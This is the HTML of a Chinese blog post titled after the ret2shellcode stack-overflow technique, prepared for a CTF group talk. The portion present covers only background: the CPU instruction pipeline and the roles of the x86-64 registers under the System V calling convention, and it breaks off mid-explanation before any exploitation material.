<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 8.1.2">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"cx256-128.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="写在前面 本篇文章主要取自于当时CTF小组汇报的时候需要准备的内容，如果有问题，欢迎直接向我反馈。本次汇报的技术基础来自  一部分计算机组成原理知识 汇编语言知识 汇编采用 AT&amp;T 写法  注： 本篇所讨论的计算机架构严格限制在 x86-64 架构，采用 System V AMD64 调用约定">
<meta property="og:type" content="article">
<meta property="og:title" content="栈溢出1:简单Ret2shellcode">
<meta property="og:url" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="写在前面 本篇文章主要取自于当时CTF小组汇报的时候需要准备的内容，如果有问题，欢迎直接向我反馈。本次汇报的技术基础来自  一部分计算机组成原理知识 汇编语言知识 汇编采用 AT&amp;T 写法  注： 本篇所讨论的计算机架构严格限制在 x86-64 架构，采用 System V AMD64 调用约定">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/CPU.png">
<meta property="og:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/memory.png">
<meta property="og:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/stack%20frame.jpg">
<meta property="og:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/main_part1.png">
<meta property="og:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/do_something.png">
<meta property="og:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/ret_do_something.png">
<meta property="og:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/ret_main.png">
<meta property="og:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/stack_frame.png">
<meta property="og:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/overflow.png">
<meta property="og:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/info_registers.png">
<meta property="og:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/stack.png">
<meta property="article:published_time" content="2026-06-09T05:10:35.000Z">
<meta property="article:modified_time" content="2026-06-10T01:19:10.249Z">
<meta property="article:author" content="Titaniam(CX256-128)">
<meta property="article:tag" content="Pwn">
<meta property="article:tag" content="栈溢出">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/CPU.png">

<link rel="canonical" href="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>栈溢出1:简单Ret2shellcode | Hexo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<!-- hexo injector head_end start --><script> let HEXO_MMEDIA_DATA = { js: [], css: [], aplayerData: [], metingData: [], artPlayerData: [], dplayerData: []}; </script><!-- hexo injector head_end end --><style>mjx-container[jax="SVG"] {
  direction: ltr;
}

mjx-container[jax="SVG"] > svg {
  overflow: visible;
}

mjx-container[jax="SVG"][display="true"] {
  display: block;
  text-align: center;
  margin: 1em 0;
}

mjx-container[jax="SVG"][justify="left"] {
  text-align: left;
}

mjx-container[jax="SVG"][justify="right"] {
  text-align: right;
}

g[data-mml-node="merror"] > g {
  fill: red;
  stroke: red;
}

g[data-mml-node="merror"] > rect[data-background] {
  fill: yellow;
  stroke: none;
}

g[data-mml-node="mtable"] > line[data-line] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > rect[data-frame] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > .mjx-dashed {
  stroke-dasharray: 140;
}

g[data-mml-node="mtable"] > .mjx-dotted {
  stroke-linecap: round;
  stroke-dasharray: 0,140;
}

g[data-mml-node="mtable"] > svg {
  overflow: visible;
}

[jax="SVG"] mjx-tool {
  display: inline-block;
  position: relative;
  width: 0;
  height: 0;
}

[jax="SVG"] mjx-tool > mjx-tip {
  position: absolute;
  top: 0;
  left: 0;
}

mjx-tool > mjx-tip {
  display: inline-block;
  padding: .2em;
  border: 1px solid #888;
  font-size: 70%;
  background-color: #F8F8F8;
  color: black;
  box-shadow: 2px 2px 5px #AAAAAA;
}

g[data-mml-node="maction"][data-toggle] {
  cursor: pointer;
}

mjx-status {
  display: block;
  position: fixed;
  left: 1em;
  bottom: 1em;
  min-width: 25%;
  padding: .2em .4em;
  border: 1px solid #888;
  font-size: 90%;
  background-color: #F8F8F8;
  color: black;
}

foreignObject[data-mjx-xml] {
  font-family: initial;
  line-height: normal;
  overflow: visible;
}

.MathJax path {
  stroke-width: 3;
}

mjx-container[display="true"] {
  overflow: auto hidden;
}

mjx-container[display="true"] + br {
  display: none;
}
</style></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Hexo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://cx256-128.github.io/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://avatars.githubusercontent.com/u/238252738">
      <meta itemprop="name" content="Titaniam(CX256-128)">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          栈溢出1:简单Ret2shellcode
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2026-06-09 13:10:35" itemprop="dateCreated datePublished" datetime="2026-06-09T13:10:35+08:00">2026-06-09</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2026-06-10 09:19:10" itemprop="dateModified" datetime="2026-06-10T09:19:10+08:00">2026-06-10</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Pwn/" itemprop="url" rel="index"><span itemprop="name">Pwn</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="写在前面"><a class="markdownIt-Anchor" href="#写在前面"></a> 写在前面</h2>
<p>本篇文章主要取自于当时CTF小组汇报的时候需要准备的内容，如果有问题，欢迎直接向我反馈。本次汇报的技术基础来自</p>
<ol>
<li>一部分计算机组成原理知识</li>
<li>汇编语言知识</li>
<li>汇编采用 AT&amp;T 写法</li>
</ol>
<p>注： 本篇所讨论的计算机架构严格限制在 <strong>x86-64</strong> 架构，采用 <strong>System V AMD64</strong> 调用约定</p>
<span id="more"></span>
<h2 id="cpu的一些知识"><a class="markdownIt-Anchor" href="#cpu的一些知识"></a> CPU的一些知识</h2>
<hr>
<img src="/2026/06/09/%E6%A0%88%E6%BA%A2%E5%87%BA1-%E7%AE%80%E5%8D%95Ret2shellcode/CPU.png" class="" title="CPU的一个简单示意图">
<div style="text-align: center">图1： CPU的一个简单示意图</div>
<p>如上述CPU的简单示意图所示，一个CPU可以抽象地分为执行单元(EU)、控制单元(CU)、寄存器(Registers)、缓存(Cache)等部分组成。一个CPU执行一条指令的过程可以分为</p>
<p class="katex-block"><span class="katex-display"><span class="katex"><span class="katex-mathml"><math><semantics><mrow><mi>I</mi><mi>F</mi><mtext>(取指)</mtext><mo>→</mo><mi>I</mi><mi>D</mi><mtext>(译码)</mtext><mo>→</mo><mi>E</mi><mi>X</mi><mtext>(执行)</mtext><mo>→</mo><mi>M</mi><mi>E</mi><mi>M</mi><mtext>(访存)</mtext><mo>→</mo><mi>W</mi><mi>B</mi><mtext>(写回)</mtext></mrow><annotation encoding="application/x-tex">IF \text{(取指)}  \to  ID \text{(译码)}  \to  EX \text{(执行)}  \to  MEM \text{(访存)}  \to  WB \text{(写回)}
</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord mathdefault" style="margin-right:0.07847em;">I</span><span class="mord mathdefault" style="margin-right:0.13889em;">F</span><span class="mord text"><span class="mord">(</span><span class="mord cjk_fallback">取指</span><span class="mord">)</span></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">→</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord mathdefault" style="margin-right:0.07847em;">I</span><span class="mord mathdefault" style="margin-right:0.02778em;">D</span><span class="mord text"><span class="mord">(</span><span class="mord cjk_fallback">译码</span><span class="mord">)</span></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">→</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord mathdefault" style="margin-right:0.05764em;">E</span><span class="mord mathdefault" style="margin-right:0.07847em;">X</span><span class="mord text"><span class="mord">(</span><span class="mord cjk_fallback">执行</span><span class="mord">)</span></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">→</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord mathdefault" style="margin-right:0.10903em;">M</span><span class="mord mathdefault" style="margin-right:0.05764em;">E</span><span class="mord mathdefault" style="margin-right:0.10903em;">M</span><span class="mord text"><span class="mord">(</span><span class="mord cjk_fallback">访存</span><span class="mord">)</span></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">→</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord mathdefault" style="margin-right:0.13889em;">W</span><span class="mord mathdefault" style="margin-right:0.05017em;">B</span><span class="mord text"><span class="mord">(</span><span class="mord cjk_fallback">写回</span><span class="mord">)</span></span></span></span></span></span></p>
<p>其中对于绝大部分现代主流架构的处理器，其底层设计要求了CPU的执行单元要执行对于数据的操作，都必须首先把数据搬运到寄存器中。同时编译器编译代码生成的<code>ELF/PE</code>文件其中有绝大多数的指令都是直接或间接操作寄存器的。这种“寄存器-寄存器”或“内存→寄存器→执行→寄存器→内存”的模式，是精简指令集（RISC）和复杂指令集（CISC）处理器在现代实现中的共同约束，也正是为什么编译器会优先使用寄存器来暂存变量、函数参数和中间计算结果。所以我们首先看其中与栈溢出这个主题最为相关的一些寄存器的名字与功能。</p>
<p class="katex-block"><span class="katex-display"><span class="katex"><span class="katex-mathml"><math><semantics><mtable rowspacing="0.24999999999999992em" columnalign="right left" columnspacing="0em"><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mi mathvariant="normal">%</mi><mi>r</mi><mi>i</mi><mi>p</mi><mi mathvariant="normal">/</mi><mi mathvariant="normal">%</mi><mi>e</mi><mi>i</mi><mi>p</mi><mspace width="1em"></mspace><mo>:</mo><mspace width="1em"></mspace></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>指令寄存器(无法通过mov指令直接修改)</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mi mathvariant="normal">%</mi><mi>r</mi><mi>b</mi><mi>p</mi><mi mathvariant="normal">/</mi><mi mathvariant="normal">%</mi><mi>e</mi><mi>b</mi><mi>p</mi><mspace width="1em"></mspace><mo>:</mo><mspace width="1em"></mspace></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>帧指针寄存器</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mi mathvariant="normal">%</mi><mi>r</mi><mi>s</mi><mi>p</mi><mi mathvariant="normal">/</mi><mi mathvariant="normal">%</mi><mi>e</mi><mi>s</mi><mi>p</mi><mspace width="1em"></mspace><mo>:</mo><mspace width="1em"></mspace></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>栈指针寄存器</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mi mathvariant="normal">%</mi><mi>r</mi><mi>d</mi><mi>i</mi><mi mathvariant="normal">/</mi><mi mathvariant="normal">%</mi><mi>e</mi><mi>d</mi><mi>i</mi><mspace width="1em"></mspace><mo>:</mo><mspace width="1em"></mspace></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>调用函数传入的第一个整数参数(也可以是地址参数)</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mi mathvariant="normal">%</mi><mi>r</mi><mi>s</mi><mi>i</mi><mi mathvariant="normal">/</mi><mi mathvariant="normal">%</mi><mi>e</mi><mi>s</mi><mi>i</mi><mspace width="1em"></mspace><mo>:</mo><mspace width="1em"></mspace></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>调用函数传入的第二个整数参数(也可以是地址参数)</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mi mathvariant="normal">%</mi><mi>r</mi><mi>d</mi><mi>x</mi><mi mathvariant="normal">/</mi><mi mathvariant="normal">%</mi><mi>e</mi><mi>d</mi><mi>x</mi><mspace width="1em"></mspace><mo>:</mo><mspace width="1em"></mspace></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>调用函数传入的第三个整数参数(也可以是地址参数)</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mi mathvariant="normal">%</mi><mi>r</mi><mi>c</mi><mi>x</mi><mi mathvariant="normal">/</mi><mi mathvariant="normal">%</mi><mi>e</mi><mi>c</mi><mi>x</mi><mspace width="1em"></mspace><mo>:</mo><mspace width="1em"></mspace></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>调用函数传入的第四个整数参数(也可以是地址参数)</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mi mathvariant="normal">%</mi><mi>r</mi><mn>8</mn><mi mathvariant="normal">/</mi><mi mathvariant="normal">%</mi><mi>r</mi><mn>8</mn><mi>d</mi><mspace width="1em"></mspace><mo>:</mo><mspace width="1em"></mspace></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>调用函数传入的第五个整数参数(也可以是地址参数)</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mi mathvariant="normal">%</mi><mi>r</mi><mn>9</mn><mi mathvariant="normal">/</mi><mi mathvariant="normal">%</mi><mi>r</mi><mn>9</mn><mi>d</mi><mspace width="1em"></mspace><mo>:</mo><mspace width="1em"></mspace></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>调用函数传入的第六个整数参数(也可以是地址参数)</mtext></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{aligned}
\%rip/\%eip\hspace{1em}	:\hspace{1em} &amp;\text{指令寄存器(无法通过mov指令直接修改)}  \\
\%rbp/\%ebp\hspace{1em}	:\hspace{1em} &amp;\text{帧指针寄存器}\\
\%rsp/\%esp\hspace{1em}	:\hspace{1em} &amp;\text{栈指针寄存器}\\
\%rdi/\%edi\hspace{1em}	:\hspace{1em} &amp;\text{调用函数传入的第一个整数参数(也可以是地址参数)}\\
\%rsi/\%esi\hspace{1em}	:\hspace{1em} &amp;\text{调用函数传入的第二个整数参数(也可以是地址参数)}\\
\%rdx/\%edx\hspace{1em}	:\hspace{1em} &amp;\text{调用函数传入的第三个整数参数(也可以是地址参数)}\\
\%rcx/\%ecx\hspace{1em}	:\hspace{1em} &amp;\text{调用函数传入的第四个整数参数(也可以是地址参数)}\\
\%r8/\%r8d\hspace{1em}	:\hspace{1em} &amp;\text{调用函数传入的第五个整数参数(也可以是地址参数)}\\
\%r9/\%r9d\hspace{1em}	:\hspace{1em} &amp;\text{调用函数传入的第六个整数参数(也可以是地址参数)}\\
\end{aligned}
</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:13.500000000000002em;vertical-align:-6.500000000000001em;"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:7.000000000000001em;"><span style="top:-9.16em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord mathdefault">i</span><span class="mord mathdefault">p</span><span class="mord">/</span><span class="mord">%</span><span class="mord mathdefault">e</span><span class="mord mathdefault">i</span><span class="mord mathdefault">p</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:1em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:1em;"></span></span></span><span style="top:-7.66em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord mathdefault">b</span><span class="mord mathdefault">p</span><span class="mord">/</span><span class="mord">%</span><span class="mord mathdefault">e</span><span class="mord mathdefault">b</span><span class="mord mathdefault">p</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:1em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:1em;"></span></span></span><span style="top:-6.16em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord mathdefault">s</span><span class="mord mathdefault">p</span><span class="mord">/</span><span class="mord">%</span><span class="mord mathdefault">e</span><span class="mord mathdefault">s</span><span class="mord mathdefault">p</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:1em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:1em;"></span></span></span><span style="top:-4.66em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord mathdefault">d</span><span class="mord mathdefault">i</span><span class="mord">/</span><span class="mord">%</span><span class="mord mathdefault">e</span><span class="mord mathdefault">d</span><span class="mord mathdefault">i</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:1em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:1em;"></span></span></span><span style="top:-3.16em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord mathdefault">s</span><span class="mord mathdefault">i</span><span class="mord">/</span><span class="mord">%</span><span class="mord mathdefault">e</span><span class="mord mathdefault">s</span><span class="mord mathdefault">i</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:1em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:1em;"></span></span></span><span style="top:-1.6599999999999993em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord mathdefault">d</span><span class="mord mathdefault">x</span><span class="mord">/</span><span class="mord">%</span><span class="mord mathdefault">e</span><span class="mord mathdefault">d</span><span class="mord mathdefault">x</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:1em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:1em;"></span></span></span><span style="top:-0.15999999999999925em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord mathdefault">c</span><span class="mord mathdefault">x</span><span class="mord">/</span><span class="mord">%</span><span class="mord mathdefault">e</span><span class="mord mathdefault">c</span><span class="mord mathdefault">x</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:1em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:1em;"></span></span></span><span style="top:1.3400000000000007em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord">8</span><span class="mord">/</span><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord">8</span><span class="mord mathdefault">d</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:1em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:1em;"></span></span></span><span style="top:2.8400000000000007em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord">9</span><span class="mord">/</span><span class="mord">%</span><span class="mord mathdefault" style="margin-right:0.02778em;">r</span><span class="mord">9</span><span class="mord mathdefault">d</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace" style="margin-right:1em;"></span><span class="mrel">:</span><span class="mspace" style="margin-right:1em;"></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:6.500000000000001em;"><span></span></span></span></span></span><span class="col-align-l"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:7.000000000000001em;"><span style="top:-9.16em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">指令寄存器</span><span class="mord">(</span><span class="mord cjk_fallback">无法通过</span><span class="mord">mov</span><span class="mord cjk_fallback">指令直接修改</span><span class="mord">)</span></span></span></span><span style="top:-7.66em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">帧指针寄存器</span></span></span></span><span style="top:-6.16em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">栈指针寄存器</span></span></span></span><span style="top:-4.66em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">调用函数传入的第一个整数参数</span><span class="mord">(</span><span class="mord cjk_fallback">也可以是地址参数</span><span class="mord">)</span></span></span></span><span style="top:-3.16em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">调用函数传入的第二个整数参数</span><span class="mord">(</span><span class="mord cjk_fallback">也可以是地址参数</span><span class="mord">)</span></span></span></span><span style="top:-1.6599999999999993em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">调用函数传入的第三个整数参数</span><span class="mord">(</span><span class="mord cjk_fallback">也可以是地址参数</span><span class="mord">)</span></span></span></span><span style="top:-0.15999999999999925em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">调用函数传入的第四个整数参数</span><span class="mord">(</span><span class="mord cjk_fallback">也可以是地址参数</span><span class="mord">)</span></span></span></span><span style="top:1.3400000000000007em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">调用函数传入的第五个整数参数</span><span class="mord">(</span><span class="mord cjk_fallback">也可以是地址参数</span><span class="mord">)</span></span></span></span><span style="top:2.8400000000000007em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">调用函数传入的第六个整数参数</span><span class="mord">(</span><span class="mord cjk_fallback">也可以是地址参数</span><span class="mord">)</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:6.500000000000001em;"><span></span></span></span></span></span></span></span></span></span></span></span></p>
<p>其中对于现代的64位处理器，每一个寄存器不管用到多少都是做成64位的(也就是可以存储64个二进制数)，同时也即8字节<span class="katex"><span class="katex-mathml"><math><semantics><mrow><mo stretchy="false">(</mo><mi>B</mi><mi>y</mi><mi>t</mi><mi>e</mi><mtext> </mtext><mo>:</mo><mtext> </mtext><mn>1</mn><mtext> </mtext><mi>B</mi><mi>y</mi><mi>t</mi><mi>e</mi><mtext> </mtext><mo>=</mo><mtext> </mtext><mn>8</mn><mtext> </mtext><mi>b</mi><mi>i</mi><mi>t</mi><mi>s</mi><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">(Byte~:~1~Byte~=~8~bits)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mopen">(</span><span class="mord mathdefault" style="margin-right:0.05017em;">B</span><span class="mord mathdefault" style="margin-right:0.03588em;">y</span><span class="mord mathdefault">t</span><span class="mord mathdefault">e</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mspace nobreak"> </span><span 